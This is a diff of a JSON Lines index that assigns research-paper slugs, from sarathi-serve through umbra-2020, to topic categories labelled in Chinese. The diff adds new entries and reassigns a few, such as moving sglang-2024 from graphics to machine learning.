+{"slug":"sandlock-confining-ai-agent-code-with-unprivileged-linux-primitives-arxiv-2605-2","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"sarathi-serve-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"sarathi-serve","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"大模型服务","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"sasrec-2018","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"scads-database-2008","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"scala-macros","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"scaling-hnsws-antirez","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"scaling-laws","area":"papers","theme":"NLP","themeId":"nlp","subcategory":"NLP","source":"category","confidence":"high","rawCategory":"NLP"} {"slug":"scann-2020","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"schgen-pcb","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"scissorhands-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"scoop","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"工具与基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} {"slug":"scott-strachey-denotational","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"sctp-multipath-2006","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"seastar-shared-nothing-2014","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"sel4-2009","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"sel4-formal-2009","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"self-1991-chambers","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"self-adjusting","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} -{"slug":"self-consistency-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"self-consistency-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"self-customization","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"self-evolving-agents-survey","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"self-evolving-recsys-2602","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} @@ -744,13 +1016,16 @@ {"slug":"self-pic","area":"papers","theme":"编译器","themeId":"compilers","subcategory":"编译器","source":"category","confidence":"high","rawCategory":"编译器"} {"slug":"self-rag-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"self-refine-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"self-trained-verification","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"selinger-1979","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"selinux-2001","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"sematune-semantic-aware-online-os-tuning-with-llms-arxiv-2605-15026","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"seq2seq-2014","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"sequel-1974","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"sequential-consistency-1979","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"server-sent-events","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"sglang-2024","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"sglang-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"sglang-radixattention","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"sgx-2013","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"shannon-1948","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"信息论","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"sharegpt4video-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} @@ -758,12 +1033,16 @@ {"slug":"shenango-2019","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"shokri-mia-2017","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"siglip-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"多模态 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"signal-double-ratchet-2016","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"sigstore-cosign-2022","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"sillito-questions","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程","source":"category","confidence":"high","rawCategory":"其他"} +{"slug":"silo-oltp-2013","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"silt-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"simhash-charikar-2002","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"simrank-2002","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"simula-67","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"sinfonia-2007","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"singularity-os-2007","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"skcc-skill-compiler","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"skeen-3pc-1981","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"skill-as-pseudocode","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} @@ -776,44 +1055,64 @@ {"slug":"sleeper-agents","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 安全","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"slim-2011","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"smalltalk-80","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"smith-waterman-1981","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生物信息","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"smoothquant-2023","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"smr-1990","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"snap-2019","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"snmalloc-2019","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"snowflake-2016","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"soft-updates-1999","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"soltesz-2007","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"sophia-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"sorkine-2004-laplacian-editing","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"souffle-datalog","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"soundness-bench","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"soundnessbench-arxiv-2605-30329","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"spacevllm-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"spann-2021","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"spanner-2012","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"spanner-corbett-2012","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"spanner","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统 / 数据库","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"sparrow-2013","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"sparse-autoencoders","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 可解释性","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"sparsegpt-2023","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"spatialclaw","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"空间推理","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"spec-agent-separation-logic","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"specbench-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"specinfer-2023","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"spectre-attack-2018","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"speculative-decoding-leviathan-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"spike-sparse-sink-anatomy","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"spinnaker-rao-2011","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"splade-2021","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"splitwise-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"sprite-1988","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"sqlite-2022","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"sqlite-durable-workflows","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"ssa","area":"papers","theme":"编译器","themeId":"compilers","subcategory":"编译器","source":"category","confidence":"high","rawCategory":"编译器"} {"slug":"st-llm-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"stable-diffusion","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生成模型","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"stacked-borrows-2019","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"stainless-2017","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"stam-1999-stable-fluids","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"standard-ml","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"starcoder-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"starrocks","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"infrastructure","source":"category","confidence":"high","rawCategory":"基础设施"} {"slug":"steensgaard-pointer","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"stein-dreamer","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"3D生成","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"step-3-5-flash","area":"papers","theme":"其他","themeId":"other","subcategory":"llm","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} {"slug":"stm-shavit-touitou","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"stonebraker-2010-sqlnosql","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"storm-multi-agent-state","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"streamingbench-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"strongtalk","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"stylegan2-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"subramanian-2002-internet-hierarchy","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"sulsky-1994-mpm","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"surflo","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"3D生成","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"swe-agent","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"swe-bench","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI / 软件工程","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"swe-rebench-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"sweeney-k-anonymity-2002","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"sycl-cpp-2020","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"sycophancy-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} @@ -829,6 +1128,7 @@ {"slug":"tao-2013","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"taso-2019","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"taubin-1995-mesh-smoothing","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"tcmalloc-google-2007","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"tcp-vegas-1995","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"tcp","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络","source":"category","confidence":"high","rawCategory":"网络协议"} {"slug":"td3-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} @@ -837,8 +1137,12 @@ {"slug":"tendermint-2016","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"tensorflow-osdi-2016","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"tensorrt-llm-2023","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"tensorrt-llm-overview","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"tesla-architecture-2008","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"test-time-compute-survey","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"推理计算","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"tflite-micro-2021","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"the-os-1968","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"the-rise-of-the-software-defined-vehicle-architectures-survey-arxiv-2605-30001","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"theorems-for-free","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"thrust-2010","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"tidb-2020","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} @@ -847,33 +1151,46 @@ {"slug":"timelinejs","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} {"slug":"timemarker-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"tla-yu-tlc-1999","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"tls-1-3-rfc8446","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"tls-1.3","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"category","confidence":"high","rawCategory":"网络协议"} {"slug":"tofte-talpin-regions","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"token-bucket-stripe","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"后端工程","source":"category","confidence":"high","rawCategory":"后端 API"} {"slug":"tomasulo-1967","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"tomita-glr","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"tool-sense","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"工具学习","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"toolformer","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"tor-2004","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"toy-models-superposition","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 可解释性","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"trace-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"tracemonkey","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"trails-inferring-code-correctness-from-specification-arxiv-2605-29822","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"transformer-xl-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"traveler-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"tree-of-attention-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"tree-of-thoughts-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"tree-sitter-2018","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"trees-that-grow","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"triaxialkv","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"trill-2014","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"triton-2019","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"triton-anatomy-paged-attn","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"triton-llm","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"trustrank-2004","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"trustzone-arm-2009","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"turchin-supercompilation","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} -{"slug":"turing-1936","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"计算理论","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"turing-1936","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"turing-architecture-2018","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"tutti-ssd-kv-cache","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"tvm-2018","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"tvm","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"twine-2020","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"u-boot-bootloader","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"umbra-2020","area":"papers","theme":"数据库","themeId":"databases","subcategory":"现代数据库","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} 